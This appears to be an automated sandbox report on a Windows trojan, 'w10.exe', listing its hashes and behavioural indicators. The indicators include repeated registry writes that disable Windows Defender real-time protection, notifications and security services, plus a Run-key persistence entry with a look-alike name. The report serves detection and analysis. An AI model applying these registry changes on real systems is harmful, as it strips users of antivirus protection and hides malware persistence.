926369b540e2f133c41d26e5ae36cc36572514e6c376b83dc6a8a676c081a318

Analysis

max time kernel
145s
max time network
127s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
20-01-2025 09:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

w10.exe
Size

153KB
MD5

987d8991d5f2bde73d7e33fb5cc12655
SHA1

e5e56a602d7a9a90a75c1a841948f0e10b8144fb
SHA256

926369b540e2f133c41d26e5ae36cc36572514e6c376b83dc6a8a676c081a318
SHA512

94dfb389930d8e7ccb3d791e5df49805becea6a8647199bcb4dfa62f0f0375d01e5f3ecba8b5bf019782a62a71487a5b86f15f933cb22cbedf3cc7ad1bfbbc28
SSDEEP

1536:ZyGpGCbYh23MdKDw5+fkVLu2+BsEOJobqUUk6Q9fmU1shr7v80lDeqUUj6R9fmUG:8GpwnGsExWUf6zVDtUU6qVQyn

Score

10^/10

defense_evasion discovery evasion persistence trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 64 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRoutinelyTakingAction = "1"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning = "1"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRoutinelyTakingAction = "1"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning = "1"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning = "1"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning = "1"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRoutinelyTakingAction = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Process not Found

Modifies Windows Defender notification settings 3 TTPs 44 IoCs

evasion trojan

Windows Service

T1543.003

Modify Registry

T1112

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications	reg.exe

Modifies security service 2 TTPs 20 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "2"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "2"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "2"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "2"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "2"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "2"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "2"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "2"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "2"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "2"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	Process not Found

Adds Run key to start application 2 TTPs 10 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SecurityHealt = "%C:\\Windows%\\system32\\SecurityHealthSystray.exe"	Process not Found
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SecurityHealt = "%C:\\Windows%\\system32\\SecurityHealthSystray.exe"	Process not Found
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SecurityHealt = "%C:\\Windows%\\system32\\SecurityHealthSystray.exe"	Process not Found
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SecurityHealt = "%C:\\Windows%\\system32\\SecurityHealthSystray.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SecurityHealt = "%C:\\Windows%\\system32\\SecurityHealthSystray.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SecurityHealt = "%C:\\Windows%\\system32\\SecurityHealthSystray.exe"	Process not Found
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SecurityHealt = "%C:\\Windows%\\system32\\SecurityHealthSystray.exe"	Process not Found
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SecurityHealt = "%C:\\Windows%\\system32\\SecurityHealthSystray.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SecurityHealt = "%C:\\Windows%\\system32\\SecurityHealthSystray.exe"	Process not Found
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SecurityHealt = "%C:\\Windows%\\system32\\SecurityHealthSystray.exe"	Process not Found

Modifies Security services 2 TTPs 64 IoCs

Modifies the startup behavior of a security service.

defense_evasion

Modify Registry

T1112

Impair Defenses

T1562

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SecurityHealthService\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start = "4"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SecurityHealthService\Start = "3"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start = "4"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start = "4"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdBoot\Start = "4"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start = "3"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SecurityHealthService\Start = "4"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start = "3"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SecurityHealthService\Start = "4"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start = "3"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start = "4"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdBoot\Start = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start = "3"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SecurityHealthService\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SecurityHealthService\Start = "3"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SecurityHealthService\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start = "4"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdBoot\Start = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start = "3"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start = "4"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start = "4"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdBoot\Start = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SecurityHealthService\Start = "4"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start = "4"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SecurityHealthService\Start = "3"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start = "3"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdBoot\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdBoot\Start = "4"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdBoot\Start = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start = "4"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start = "3"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start = "4"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdBoot\Start = "4"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SecurityHealthService\Start = "3"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start = "3"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start = "3"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start = "4"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SecurityHealthService\Start = "3"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start = "3"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start = "3"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SecurityHealthService\Start = "4"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start = "4"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start = "3"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SecurityHealthService\Start = "3"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdBoot\Start = "4"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdBoot\Start = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SecurityHealthService\Start = "3"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start = "4"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start = "3"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start = "3"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start = "4"	Process not Found

An obfuscated cmd.exe command-line is typically used to evade detection. 22 IoCs

pid	Process
3020	cmd.exe
3628	cmd.exe
2456	cmd.exe
1920	cmd.exe
820	cmd.exe
3956	cmd.exe
5828	cmd.exe
5060	cmd.exe
2920	Process not Found
2248	Process not Found
6176	Process not Found
6748	Process not Found
10112	Process not Found
9004	Process not Found
9976	Process not Found
7360	Process not Found
7864	Process not Found
3544	Process not Found
6344	Process not Found
8092	Process not Found
1976	Process not Found
2936	Process not Found

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
